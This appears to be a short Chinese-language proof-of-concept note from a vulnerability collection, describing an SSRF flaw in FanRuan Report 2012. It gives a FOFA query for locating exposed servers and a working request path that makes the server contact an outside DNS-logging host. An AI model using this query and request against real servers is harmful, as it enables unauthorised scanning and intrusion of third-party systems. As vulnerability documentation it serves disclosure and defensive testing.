Awesome-POC/OA产品漏洞/帆软报表 2012 SSRF漏洞.md

29 lines
390 B
Markdown
Raw Normal View History

2022-02-21 09:35:01 +08:00
# 帆软报表 2012 SSRF漏洞
## 漏洞描述
帆软报表 2012 存在信息泄露漏洞通过访问特定的Url获取造成SSRF
## 漏洞影响
```
帆软报表 2012
```
## FOFA
```
body="down.download?FM_SYS_ID"
```
## 漏洞复现
漏洞验证Url为
```plain
/ReportServer?op=resource&resource=0m0m6k.dnslog.cn
```
2022-12-05 11:09:28 +08:00
![image-20220209113126929](./images/202202091131035.png)
2022-02-21 09:35:01 +08:00